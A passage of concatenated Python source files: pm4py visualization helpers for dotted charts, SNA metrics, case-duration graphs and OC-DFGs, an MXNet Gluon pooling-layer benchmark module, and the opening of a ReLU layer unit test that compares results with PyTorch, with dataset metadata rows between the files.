    Default attribute selection for the dotted chart.

    When `attributes` is None, the log is converted to an EventLog,
    sorted by timestamp, each trace is tagged with its positional
    "@@index" attribute, and the default triple
    (timestamp, case index, activity) is returned.

    Parameters
    -----------------
    log
        Event log
    attributes
        Attribute list, or None to select the defaults

    Returns
    -----------------
    log
        (Possibly converted/sorted) event log
    attributes
        List of attributes
    """
    general_checks_classical_event_log(log)
    if attributes is not None:
        # Caller-specified attributes: leave the log untouched.
        return log, attributes
    from pm4py.util import xes_constants
    from pm4py.objects.log.util import sorting
    from pm4py.convert import convert_to_event_log
    event_log = convert_to_event_log(log)
    event_log = sorting.sort_timestamp(event_log, xes_constants.DEFAULT_TIMESTAMP_KEY)
    # Tag every trace with its position so cases can be plotted in order.
    for idx, trace in enumerate(event_log):
        trace.attributes["@@index"] = idx
    return event_log, ["time:timestamp", "case:@@index", "concept:name"]
def view_dotted_chart(log, format: str = "png", attributes=None):
    """
    Displays the dotted chart on screen.

    Parameters
    -----------------
    log
        Event log
    format
        Image format
    attributes
        Attributes used to construct the dotted chart. If None, the
        default chart is shown (x-axis: time; y-axis: cases in order of
        occurrence; color: activity). For custom attributes, pass a list
        [x-axis attribute, y-axis attribute, color attribute], e.g.
        ["concept:name", "org:resource", "concept:name"].
    """
    general_checks_classical_event_log(log)
    log, attributes = __dotted_attribute_selection(log, attributes)
    from pm4py.visualization.dotted_chart import visualizer as dotted_chart_visualizer
    viz_parameters = {"format": format}
    gviz = dotted_chart_visualizer.apply(log, attributes, parameters=viz_parameters)
    dotted_chart_visualizer.view(gviz)
def save_vis_dotted_chart(log, file_path: str, attributes=None):
    """
    Saves the visualization of the dotted chart; the image format is
    inferred from the file extension.

    Parameters
    -----------------
    log
        Event log
    file_path
        Destination path
    attributes
        Attributes used to construct the dotted chart (for example,
        ["concept:name", "org:resource"]); None selects the defaults
    """
    general_checks_classical_event_log(log)
    image_format = os.path.splitext(file_path)[1][1:]
    log, attributes = __dotted_attribute_selection(log, attributes)
    from pm4py.visualization.dotted_chart import visualizer as dotted_chart_visualizer
    gviz = dotted_chart_visualizer.apply(log, attributes, parameters={"format": image_format})
    dotted_chart_visualizer.save(gviz, file_path)
def view_sna(sna_metric):
    """
    Represents a SNA metric (.html) on screen.

    Parameters
    ---------------
    sna_metric
        Values of the metric
    """
    from pm4py.visualization.sna import visualizer as sna_visualizer
    pyvis_variant = sna_visualizer.Variants.PYVIS
    gviz = sna_visualizer.apply(sna_metric, variant=pyvis_variant)
    sna_visualizer.view(gviz)
def save_vis_sna(sna_metric, file_path: str):
    """
    Saves the visualization of a SNA metric into a .html file.

    Parameters
    ----------------
    sna_metric
        Values of the metric
    file_path
        Destination path
    """
    from pm4py.visualization.sna import visualizer as sna_visualizer
    pyvis_variant = sna_visualizer.Variants.PYVIS
    gviz = sna_visualizer.apply(sna_metric, variant=pyvis_variant)
    sna_visualizer.save(gviz, file_path)
def view_case_duration_graph(log: Union[EventLog, pd.DataFrame], format: str = "png"):
    """
    Visualizes the case duration graph on screen.

    Parameters
    -----------------
    log
        Log object
    format
        Format of the visualization (png, svg, ...)
    """
    general_checks_classical_event_log(log)
    # Pick the statistics backend matching the log representation; both
    # expose the same get_kde_caseduration API.
    if check_is_pandas_dataframe(log):
        check_pandas_dataframe_columns(log)
        from pm4py.statistics.traces.generic.pandas import case_statistics
    else:
        from pm4py.statistics.traces.generic.log import case_statistics
    graph = case_statistics.get_kde_caseduration(log, parameters=get_properties(log))
    from pm4py.visualization.graphs import visualizer as graphs_visualizer
    graph_vis = graphs_visualizer.apply(graph[0], graph[1], variant=graphs_visualizer.Variants.CASES,
                                        parameters={"format": format})
    graphs_visualizer.view(graph_vis)
def save_vis_case_duration_graph(log: Union[EventLog, pd.DataFrame], file_path: str):
    """
    Saves the case duration graph in the specified path; the image format
    is inferred from the file extension.

    Parameters
    ----------------
    log
        Log object
    file_path
        Destination path
    """
    general_checks_classical_event_log(log)
    # Pick the statistics backend matching the log representation.
    if check_is_pandas_dataframe(log):
        check_pandas_dataframe_columns(log)
        from pm4py.statistics.traces.generic.pandas import case_statistics
    else:
        from pm4py.statistics.traces.generic.log import case_statistics
    graph = case_statistics.get_kde_caseduration(log, parameters=get_properties(log))
    image_format = os.path.splitext(file_path)[1][1:]
    from pm4py.visualization.graphs import visualizer as graphs_visualizer
    graph_vis = graphs_visualizer.apply(graph[0], graph[1], variant=graphs_visualizer.Variants.CASES,
                                        parameters={"format": image_format})
    graphs_visualizer.save(graph_vis, file_path)
def view_events_per_time_graph(log: Union[EventLog, pd.DataFrame], format: str = "png"):
    """
    Visualizes the events per time graph on screen.

    Parameters
    -----------------
    log
        Log object
    format
        Format of the visualization (png, svg, ...)
    """
    general_checks_classical_event_log(log)
    # Pick the attributes backend matching the log representation.
    if check_is_pandas_dataframe(log):
        check_pandas_dataframe_columns(log)
        from pm4py.statistics.attributes.pandas import get as attributes_get
    else:
        from pm4py.statistics.attributes.log import get as attributes_get
    graph = attributes_get.get_kde_date_attribute(log, parameters=get_properties(log))
    from pm4py.visualization.graphs import visualizer as graphs_visualizer
    graph_vis = graphs_visualizer.apply(graph[0], graph[1], variant=graphs_visualizer.Variants.DATES,
                                        parameters={"format": format})
    graphs_visualizer.view(graph_vis)
def save_vis_events_per_time_graph(log: Union[EventLog, pd.DataFrame], file_path: str):
    """
    Saves the events per time graph in the specified path; the image
    format is inferred from the file extension.

    Parameters
    ----------------
    log
        Log object
    file_path
        Destination path
    """
    general_checks_classical_event_log(log)
    # Pick the attributes backend matching the log representation.
    if check_is_pandas_dataframe(log):
        check_pandas_dataframe_columns(log)
        from pm4py.statistics.attributes.pandas import get as attributes_get
    else:
        from pm4py.statistics.attributes.log import get as attributes_get
    graph = attributes_get.get_kde_date_attribute(log, parameters=get_properties(log))
    image_format = os.path.splitext(file_path)[1][1:]
    from pm4py.visualization.graphs import visualizer as graphs_visualizer
    graph_vis = graphs_visualizer.apply(graph[0], graph[1], variant=graphs_visualizer.Variants.DATES,
                                        parameters={"format": image_format})
    graphs_visualizer.save(graph_vis, file_path)
def view_performance_spectrum(log: Union[EventLog, pd.DataFrame], activities: List[str], format: str = "png"):
    """
    Displays the performance spectrum on screen.

    Parameters
    ----------------
    log
        Event log
    activities
        List of activities (in order) used to build the performance spectrum
    format
        Format of the visualization (png, svg, ...)
    """
    general_checks_classical_event_log(log)
    from pm4py.algo.discovery.performance_spectrum import algorithm as performance_spectrum
    spectrum = performance_spectrum.apply(log, activities, parameters=get_properties(log))
    from pm4py.visualization.performance_spectrum import visualizer as perf_spectrum_visualizer
    from pm4py.visualization.performance_spectrum.variants import neato
    viz_parameters = {neato.Parameters.FORMAT.value: format}
    gviz = perf_spectrum_visualizer.apply(spectrum, parameters=viz_parameters)
    perf_spectrum_visualizer.view(gviz)
def save_vis_performance_spectrum(log: Union[EventLog, pd.DataFrame], activities: List[str], file_path: str):
    """
    Saves the visualization of the performance spectrum to a file; the
    image format is inferred from the file extension.

    Parameters
    ---------------
    log
        Event log
    activities
        List of activities (in order) used to build the performance spectrum
    file_path
        Destination path (including the extension)
    """
    general_checks_classical_event_log(log)
    from pm4py.algo.discovery.performance_spectrum import algorithm as performance_spectrum
    spectrum = performance_spectrum.apply(log, activities, parameters=get_properties(log))
    from pm4py.visualization.performance_spectrum import visualizer as perf_spectrum_visualizer
    from pm4py.visualization.performance_spectrum.variants import neato
    image_format = os.path.splitext(file_path)[1][1:]
    viz_parameters = {neato.Parameters.FORMAT.value: image_format}
    gviz = perf_spectrum_visualizer.apply(spectrum, parameters=viz_parameters)
    perf_spectrum_visualizer.save(gviz, file_path)
def __builds_events_distribution_graph(log: Union[EventLog, pd.DataFrame], distr_type: str = "days_week"):
    """
    Internal method to build the events distribution graph.

    Returns the plot title, axis labels, and the (x, y) data of the
    distribution for the given `distr_type`.
    """
    general_checks_classical_event_log(log)
    # Title / x-axis label per supported distribution type.
    labels = {
        "days_month": ("Distribution of the Events over the Days of a Month", "Day of month"),
        "months": ("Distribution of the Events over the Months", "Month"),
        "years": ("Distribution of the Events over the Years", "Year"),
        "hours": ("Distribution of the Events over the Hours", "Hour (of day)"),
        "days_week": ("Distribution of the Events over the Days of a Week", "Day of the Week"),
    }
    if distr_type not in labels:
        raise Exception("unsupported distribution specified.")
    title, x_axis = labels[distr_type]
    y_axis = "Number of Events"
    # Pick the attributes backend matching the log representation.
    if check_is_pandas_dataframe(log):
        check_pandas_dataframe_columns(log)
        from pm4py.statistics.attributes.pandas import get as attributes_get
    else:
        from pm4py.statistics.attributes.log import get as attributes_get
    x, y = attributes_get.get_events_distribution(log, distr_type=distr_type, parameters=get_properties(log))
    return title, x_axis, y_axis, x, y
def view_events_distribution_graph(log: Union[EventLog, pd.DataFrame], distr_type: str = "days_week", format="png"):
    """
    Shows the distribution of the events in the specified dimension.

    Parameters
    ----------------
    log
        Event log
    distr_type
        Type of distribution (default: days_week):
        - days_month => events per day of the month (1..31)
        - months     => events per month (1..12)
        - years      => events per year of the event log
        - hours      => events per hour of the day (0..23)
        - days_week  => events per day of the week (Monday..Sunday)
    format
        Format of the visualization (default: png)
    """
    general_checks_classical_event_log(log)
    title, x_axis, y_axis, x, y = __builds_events_distribution_graph(log, distr_type)
    parameters = copy(get_properties(log))
    parameters.update({"title": title, "x_axis": x_axis, "y_axis": y_axis, "format": format})
    from pm4py.visualization.graphs import visualizer as graphs_visualizer
    gviz = graphs_visualizer.apply(x, y, variant=graphs_visualizer.Variants.BARPLOT, parameters=parameters)
    graphs_visualizer.view(gviz)
def save_vis_events_distribution_graph(log: Union[EventLog, pd.DataFrame], file_path: str,
                                       distr_type: str = "days_week"):
    """
    Saves the distribution of the events in a picture file; the image
    format is inferred from the file extension.

    Parameters
    ----------------
    log
        Event log
    file_path
        Destination path (including the extension)
    distr_type
        Type of distribution (default: days_week):
        - days_month => events per day of the month (1..31)
        - months     => events per month (1..12)
        - years      => events per year of the event log
        - hours      => events per hour of the day (0..23)
        - days_week  => events per day of the week (Monday..Sunday)
    """
    general_checks_classical_event_log(log)
    image_format = os.path.splitext(file_path)[1][1:]
    title, x_axis, y_axis, x, y = __builds_events_distribution_graph(log, distr_type)
    parameters = copy(get_properties(log))
    parameters.update({"title": title, "x_axis": x_axis, "y_axis": y_axis, "format": image_format})
    from pm4py.visualization.graphs import visualizer as graphs_visualizer
    gviz = graphs_visualizer.apply(x, y, variant=graphs_visualizer.Variants.BARPLOT, parameters=parameters)
    graphs_visualizer.save(gviz, file_path)
def view_ocdfg(ocdfg: Dict[str, Any], annotation: str = "frequency", act_metric: str = "events", edge_metric="event_couples", act_threshold: int = 0, edge_threshold: int = 0, performance_aggregation: str = "mean", format: str = "png"):
    """
    Views an OC-DFG (object-centric directly-follows graph) with the provided configuration.

    Parameters
    ----------
    ocdfg
        Object-centric directly-follows graph
    annotation
        Annotation to use: "frequency" or "performance"
    act_metric
        Metric for the activities: "events" (default), "unique_objects", "total_objects"
    edge_metric
        Metric for the edges: "event_couples" (default), "unique_objects", "total_objects"
    act_threshold
        Minimum frequency for an activity to be kept in the graph (default: 0)
    edge_threshold
        Minimum frequency for an edge to be kept in the graph (default: 0)
    performance_aggregation
        Aggregation measure for the performance: mean, median, min, max, sum
    format
        Format of the output visualization (default: "png")
    """
    from pm4py.visualization.ocel.ocdfg import visualizer
    from pm4py.visualization.ocel.ocdfg.variants import classic
    classic_params = classic.Parameters
    parameters = {
        classic_params.FORMAT: format,
        classic_params.ANNOTATION: annotation,
        classic_params.ACT_METRIC: act_metric,
        classic_params.EDGE_METRIC: edge_metric,
        classic_params.ACT_THRESHOLD: act_threshold,
        classic_params.EDGE_THRESHOLD: edge_threshold,
        classic_params.PERFORMANCE_AGGREGATION_MEASURE: performance_aggregation,
    }
    gviz = classic.apply(ocdfg, parameters=parameters)
    visualizer.view(gviz)
def save_vis_ocdfg(ocdfg: Dict[str, Any], file_path: str, annotation: str = "frequency", act_metric: str = "events", edge_metric="event_couples", act_threshold: int = 0, edge_threshold: int = 0, performance_aggregation: str = "mean"):
    """
    Saves the visualization of an OC-DFG (object-centric directly-follows graph)
    with the provided configuration; the image format is inferred from the
    file extension.

    Parameters
    ----------
    ocdfg
        Object-centric directly-follows graph
    file_path
        Destination path (including the extension)
    annotation
        Annotation to use: "frequency" or "performance"
    act_metric
        Metric for the activities: "events" (default), "unique_objects", "total_objects"
    edge_metric
        Metric for the edges: "event_couples" (default), "unique_objects", "total_objects"
    act_threshold
        Minimum frequency for an activity to be kept in the graph (default: 0)
    edge_threshold
        Minimum frequency for an edge to be kept in the graph (default: 0)
    performance_aggregation
        Aggregation measure for the performance: mean, median, min, max, sum
    """
    image_format = os.path.splitext(file_path)[1][1:]
    from pm4py.visualization.ocel.ocdfg import visualizer
    from pm4py.visualization.ocel.ocdfg.variants import classic
    classic_params = classic.Parameters
    parameters = {
        classic_params.FORMAT: image_format,
        classic_params.ANNOTATION: annotation,
        classic_params.ACT_METRIC: act_metric,
        classic_params.EDGE_METRIC: edge_metric,
        classic_params.ACT_THRESHOLD: act_threshold,
        classic_params.EDGE_THRESHOLD: edge_threshold,
        classic_params.PERFORMANCE_AGGREGATION_MEASURE: performance_aggregation,
    }
    gviz = classic.apply(ocdfg, parameters=parameters)
    visualizer.save(gviz, file_path)
| 38.540323 | 235 | 0.697322 | 3,505 | 28,674 | 5.517261 | 0.082168 | 0.025132 | 0.036405 | 0.020219 | 0.867825 | 0.83866 | 0.818802 | 0.770762 | 0.749871 | 0.740614 | 0 | 0.005237 | 0.214131 | 28,674 | 743 | 236 | 38.592194 | 0.852933 | 0.309514 | 0 | 0.70068 | 0 | 0 | 0.037515 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.20068 | 0 | 0.302721 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fb3415daeb77fcfe95e9329cd8e678377bd6757d | 16,202 | py | Python | mxnet_benchmarks/nn_operations/pooling_operations.py | sandeep-krishnamurthy/dl-operator-benchmark | 965797d2b847c840a4b8ef29c70c631f6642890a | [
"Apache-2.0"
] | 6 | 2019-05-01T22:05:05.000Z | 2020-02-13T19:07:27.000Z | mxnet_benchmarks/nn_operations/pooling_operations.py | sandeep-krishnamurthy/dl-operator-benchmark | 965797d2b847c840a4b8ef29c70c631f6642890a | [
"Apache-2.0"
] | 2 | 2019-11-09T06:38:09.000Z | 2019-11-09T06:41:44.000Z | mxnet_benchmarks/nn_operations/pooling_operations.py | sandeep-krishnamurthy/dl-operator-benchmark | 965797d2b847c840a4b8ef29c70c631f6642890a | [
"Apache-2.0"
] | null | null | null | import mxnet as mx
import mxnet.ndarray as nd
from mxnet.gluon import nn
from utils.common_utils import get_class_members_in_module
from mxnet_benchmarks.utils.gluon_utils import block_forward_backward_and_time
from mxnet_benchmarks.utils.ndarray_utils import get_mx_ndarray
from mxnet_benchmarks.MXNetOperatorBenchmark import MXNetOperatorBenchmarkBase
""" Performance benchmark tests for MXNet Gluon Pooling Layers
1. MaxPool1D
2. MaxPool2D
3. AvgPool1D
4. AvgPool2D
5. GlobalMaxPool1D
6. GlobalMaxPool2D
7. GlobalAvgPool1D
8. GlobalAvgPool2D
"""
class MaxPool1D(MXNetOperatorBenchmarkBase):
    """Helps to benchmark Gluon MaxPool1D Block.

    By default, benchmarks both forward and backward pass on the MaxPool1D
    block with pool_size 2, no strides, padding 0 and layout (N, C, W) on an
    input of shape (32, 3, 256), in 'float32' precision. This setting is
    influenced from the ResNet architecture.
    """

    def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
        # Default benchmark configuration; entries can be overridden via `inputs`.
        default_parameters = {
            "data": (32, 3, 256),
            "data_initializer": nd.normal,
            "pool_size": 2,
            "strides": None,
            "padding": 0,
            "layout": "NCW",
            "run_backward": True,
            "dtype": "float32",
        }
        super().__init__(ctx=ctx, warmup=warmup, runs=runs,
                         default_parameters=default_parameters,
                         custom_parameters=inputs)

        # Input tensor (gradient attached when the backward pass is benchmarked).
        self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=self.inputs["data"],
                                   dtype=self.inputs["dtype"],
                                   initializer=self.inputs["data_initializer"],
                                   attach_grad=self.inputs["run_backward"])
        # Block under benchmark.
        self.block = nn.MaxPool1D(pool_size=self.inputs["pool_size"],
                                  strides=self.inputs["strides"],
                                  padding=self.inputs["padding"],
                                  layout=self.inputs["layout"])
        self.block.initialize(ctx=self.ctx)

    def run_benchmark(self):
        # Warm-up phase: execution time is discarded.
        _, _ = block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
        # Timed phase: record the mean per-run forward+backward time.
        total_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
        self.results["MX_Gluon_Imperative_MaxPool1D_Forward_Backward_Time"] = total_time / self.runs
class MaxPool2D(MXNetOperatorBenchmarkBase):
    """Benchmark the Gluon MaxPool2D block.

    Times forward (and, by default, backward) passes of a MaxPool2D block
    with (2, 2) pool_size, no strides, (0, 0) padding and layout
    (N, C, H, W) on an input of shape (32, 3, 256, 256). Defaults follow
    the ResNet setting and run in 'float32' precision.
    """

    def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
        # Default inputs; any key can be overridden through `inputs`.
        defaults = {
            "data": (32, 3, 256, 256),
            "data_initializer": nd.normal,
            "pool_size": (2, 2),
            "strides": None,
            "padding": (0, 0),
            "layout": "NCHW",
            "run_backward": True,
            "dtype": "float32",
        }
        super().__init__(ctx=ctx, warmup=warmup, runs=runs,
                         default_parameters=defaults,
                         custom_parameters=inputs)

        params = self.inputs
        self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=params["data"],
                                   dtype=params["dtype"],
                                   initializer=params["data_initializer"],
                                   attach_grad=params["run_backward"])
        self.block = nn.MaxPool2D(pool_size=params["pool_size"],
                                  strides=params["strides"],
                                  padding=params["padding"],
                                  layout=params["layout"])
        self.block.initialize(ctx=self.ctx)

    def run_benchmark(self):
        # Warm-up passes: run and discard the timing.
        block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
        # Timed passes: record the mean time per run.
        total_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
        self.results["MX_Gluon_Imperative_MaxPool2D_Forward_Backward_Time"] = total_time / self.runs
class AvgPool1D(MXNetOperatorBenchmarkBase):
    """Benchmark the Gluon AvgPool1D block.

    Times forward (and, by default, backward) passes of an AvgPool1D block
    with pool_size 2, no strides, padding 0 and layout (N, C, W) on an input
    of shape (32, 3, 256). Defaults follow the ResNet setting and run in
    'float32' precision.
    """

    def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
        # Default inputs; any key can be overridden through `inputs`.
        defaults = {
            "data": (32, 3, 256),
            "data_initializer": nd.normal,
            "pool_size": 2,
            "strides": None,
            "padding": 0,
            "layout": "NCW",
            "run_backward": True,
            "dtype": "float32",
        }
        super().__init__(ctx=ctx, warmup=warmup, runs=runs,
                         default_parameters=defaults,
                         custom_parameters=inputs)

        params = self.inputs
        self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=params["data"],
                                   dtype=params["dtype"],
                                   initializer=params["data_initializer"],
                                   attach_grad=params["run_backward"])
        self.block = nn.AvgPool1D(pool_size=params["pool_size"],
                                  strides=params["strides"],
                                  padding=params["padding"],
                                  layout=params["layout"])
        self.block.initialize(ctx=self.ctx)

    def run_benchmark(self):
        # Warm-up passes: run and discard the timing.
        block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
        # Timed passes: record the mean time per run.
        total_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
        self.results["MX_Gluon_Imperative_AvgPool1D_Forward_Backward_Time"] = total_time / self.runs
class AvgPool2D(MXNetOperatorBenchmarkBase):
    """Benchmark the Gluon AvgPool2D block.

    Times forward (and, by default, backward) passes of an AvgPool2D block
    with (2, 2) pool_size, no strides, (0, 0) padding and layout
    (N, C, H, W) on an input of shape (32, 3, 256, 256). Defaults follow
    the ResNet setting and run in 'float32' precision.
    """

    def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
        # Default inputs; any key can be overridden through `inputs`.
        defaults = {
            "data": (32, 3, 256, 256),
            "data_initializer": nd.normal,
            "pool_size": (2, 2),
            "strides": None,
            "padding": (0, 0),
            "layout": "NCHW",
            "run_backward": True,
            "dtype": "float32",
        }
        super().__init__(ctx=ctx, warmup=warmup, runs=runs,
                         default_parameters=defaults,
                         custom_parameters=inputs)

        params = self.inputs
        self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=params["data"],
                                   dtype=params["dtype"],
                                   initializer=params["data_initializer"],
                                   attach_grad=params["run_backward"])
        self.block = nn.AvgPool2D(pool_size=params["pool_size"],
                                  strides=params["strides"],
                                  padding=params["padding"],
                                  layout=params["layout"])
        self.block.initialize(ctx=self.ctx)

    def run_benchmark(self):
        # Warm-up passes: run and discard the timing.
        block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
        # Timed passes: record the mean time per run.
        total_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
        self.results["MX_Gluon_Imperative_AvgPool2D_Forward_Backward_Time"] = total_time / self.runs
class GlobalMaxPool1D(MXNetOperatorBenchmarkBase):
    """Benchmark the Gluon GlobalMaxPool1D block.

    Times forward (and, by default, backward) passes with layout (N, C, W)
    on an input of shape (32, 3, 256), in 'float32' precision by default.
    """

    def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
        # Default inputs; any key can be overridden through `inputs`.
        defaults = {
            "data": (32, 3, 256),
            "data_initializer": nd.normal,
            "layout": "NCW",
            "run_backward": True,
            "dtype": "float32",
        }
        super().__init__(ctx=ctx, warmup=warmup, runs=runs,
                         default_parameters=defaults,
                         custom_parameters=inputs)

        params = self.inputs
        self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=params["data"],
                                   dtype=params["dtype"],
                                   initializer=params["data_initializer"],
                                   attach_grad=params["run_backward"])
        self.block = nn.GlobalMaxPool1D(layout=params["layout"])
        self.block.initialize(ctx=self.ctx)

    def run_benchmark(self):
        # Warm-up passes: run and discard the timing.
        block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
        # Timed passes: record the mean time per run.
        total_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
        self.results["MX_Gluon_Imperative_GlobalMaxPool1D_Forward_Backward_Time"] = total_time / self.runs
class GlobalMaxPool2D(MXNetOperatorBenchmarkBase):
    """Benchmark the Gluon GlobalMaxPool2D block.

    Times forward (and, by default, backward) passes with layout
    (N, C, H, W) on an input of shape (32, 3, 256, 256), in 'float32'
    precision by default.
    """

    def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
        # Default inputs; any key can be overridden through `inputs`.
        defaults = {
            "data": (32, 3, 256, 256),
            "data_initializer": nd.normal,
            "layout": "NCHW",
            "run_backward": True,
            "dtype": "float32",
        }
        super().__init__(ctx=ctx, warmup=warmup, runs=runs,
                         default_parameters=defaults,
                         custom_parameters=inputs)

        params = self.inputs
        self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=params["data"],
                                   dtype=params["dtype"],
                                   initializer=params["data_initializer"],
                                   attach_grad=params["run_backward"])
        self.block = nn.GlobalMaxPool2D(layout=params["layout"])
        self.block.initialize(ctx=self.ctx)

    def run_benchmark(self):
        # Warm-up passes: run and discard the timing.
        block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
        # Timed passes: record the mean time per run.
        total_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
        self.results["MX_Gluon_Imperative_GlobalMaxPool2D_Forward_Backward_Time"] = total_time / self.runs
class GlobalAvgPool1D(MXNetOperatorBenchmarkBase):
    """Benchmark the Gluon GlobalAvgPool1D block.

    Times forward (and, by default, backward) passes with layout (N, C, W)
    on an input of shape (32, 3, 256), in 'float32' precision by default.
    """

    def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
        # Default inputs; any key can be overridden through `inputs`.
        defaults = {
            "data": (32, 3, 256),
            "data_initializer": nd.normal,
            "layout": "NCW",
            "run_backward": True,
            "dtype": "float32",
        }
        super().__init__(ctx=ctx, warmup=warmup, runs=runs,
                         default_parameters=defaults,
                         custom_parameters=inputs)

        params = self.inputs
        self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=params["data"],
                                   dtype=params["dtype"],
                                   initializer=params["data_initializer"],
                                   attach_grad=params["run_backward"])
        self.block = nn.GlobalAvgPool1D(layout=params["layout"])
        self.block.initialize(ctx=self.ctx)

    def run_benchmark(self):
        # Warm-up passes: run and discard the timing.
        block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
        # Timed passes: record the mean time per run.
        total_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
        self.results["MX_Gluon_Imperative_GlobalAvgPool1D_Forward_Backward_Time"] = total_time / self.runs
class GlobalAvgPool2D(MXNetOperatorBenchmarkBase):
    """Benchmark the Gluon GlobalAvgPool2D block.

    Times forward (and, by default, backward) passes with layout
    (N, C, H, W) on an input of shape (32, 3, 256, 256), in 'float32'
    precision by default.
    """

    def __init__(self, ctx=mx.cpu(), warmup=5, runs=25, inputs=None):
        # Default inputs; any key can be overridden through `inputs`.
        defaults = {
            "data": (32, 3, 256, 256),
            "data_initializer": nd.normal,
            "layout": "NCHW",
            "run_backward": True,
            "dtype": "float32",
        }
        super().__init__(ctx=ctx, warmup=warmup, runs=runs,
                         default_parameters=defaults,
                         custom_parameters=inputs)

        params = self.inputs
        self.data = get_mx_ndarray(ctx=self.ctx, in_tensor=params["data"],
                                   dtype=params["dtype"],
                                   initializer=params["data_initializer"],
                                   attach_grad=params["run_backward"])
        self.block = nn.GlobalAvgPool2D(layout=params["layout"])
        self.block.initialize(ctx=self.ctx)

    def run_benchmark(self):
        # Warm-up passes: run and discard the timing.
        block_forward_backward_and_time(block=self.block, runs=self.warmup, x=self.data)
        # Timed passes: record the mean time per run.
        total_time, _ = block_forward_backward_and_time(block=self.block, runs=self.runs, x=self.data)
        self.results["MX_Gluon_Imperative_GlobalAvgPool2D_Forward_Backward_Time"] = total_time / self.runs
# Utilities
def run_all_gluon_nn_pooling_operations_benchmarks(ctx, inputs):
    """Run every Gluon pooling-layer benchmark defined in this module.

    Each benchmark class found in the module is instantiated with the given
    context and inputs, executed, and its results printed.

    :return: list[dict], one dictionary of benchmark results per operator.
    """
    all_results = []
    for _, benchmark_cls in get_class_members_in_module(__name__):
        bench = benchmark_cls(ctx=ctx, inputs=inputs)
        bench.run_benchmark()
        bench.print_benchmark_results()
        all_results.append(bench.get_benchmark_results())
    return all_results
| 43.789189 | 116 | 0.592087 | 1,817 | 16,202 | 5.069345 | 0.075399 | 0.056454 | 0.036912 | 0.042449 | 0.850939 | 0.812398 | 0.812398 | 0.808707 | 0.779069 | 0.779069 | 0 | 0.02282 | 0.307616 | 16,202 | 369 | 117 | 43.907859 | 0.798271 | 0.19226 | 0 | 0.791667 | 0 | 0 | 0.10949 | 0.034077 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088542 | false | 0 | 0.036458 | 0 | 0.171875 | 0.005208 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
34893a29455dcad93aab67b63aa05e01f3583831 | 9,581 | py | Python | tests/dl_test/layers/activation_test.py | nuka137/DeepLearningFramework | 613881e46b48c2206b9424a49106455cb2336d2e | [
"MIT"
] | 10 | 2020-06-28T05:50:41.000Z | 2022-01-30T01:31:43.000Z | tests/dl_test/layers/activation_test.py | nuka137/DeepLearningFramework | 613881e46b48c2206b9424a49106455cb2336d2e | [
"MIT"
] | null | null | null | tests/dl_test/layers/activation_test.py | nuka137/DeepLearningFramework | 613881e46b48c2206b9424a49106455cb2336d2e | [
"MIT"
] | 1 | 2020-07-26T12:36:32.000Z | 2020-07-26T12:36:32.000Z | import numpy as np
import torch
import torch.nn.functional as F
import random
from dl.layers.activation import(
ReluLayer,
SigmoidLayer,
TanhLayer,
SoftmaxWithLossLayer,
)
from .. import common
class ReluLayerTest(common.DlTestBase):
    """Check ReluLayer forward/backward against torch.nn.functional.relu."""

    name = "ReluLayerTest"
    module_name = __module__

    def setUp(self):
        super().setUp()
        # Seed every RNG so runs are deterministic.
        random.seed(1)
        np.random.seed(1)
        torch.manual_seed(1)

    def tearDown(self):
        super().tearDown()

    def _check_forward(self, x):
        # Forward output must match PyTorch's relu in shape and value.
        layer = ReluLayer()
        layer.initialize_parameters()
        actual = layer.forward(x)
        expect = self.torch_to_numpy(F.relu(self.numpy_to_torch(x)))
        self.assertEquals(expect.shape, actual.shape)
        self.assertClose(expect, actual)

    def _check_backward(self, x):
        # Gradient w.r.t. x must match PyTorch autograd with an all-ones
        # upstream gradient.
        layer = ReluLayer()
        layer.initialize_parameters()
        y = layer.forward(x)
        dx_actual = layer.backward(np.ones(y.shape))
        x_torch = self.numpy_to_torch(x, requires_grad=True)
        y_torch = F.relu(x_torch)
        y_torch.backward(gradient=torch.ones(y_torch.shape))
        dx_expect = self.torch_to_numpy(x_torch.grad)
        self.assertEquals(dx_actual.shape, dx_expect.shape)
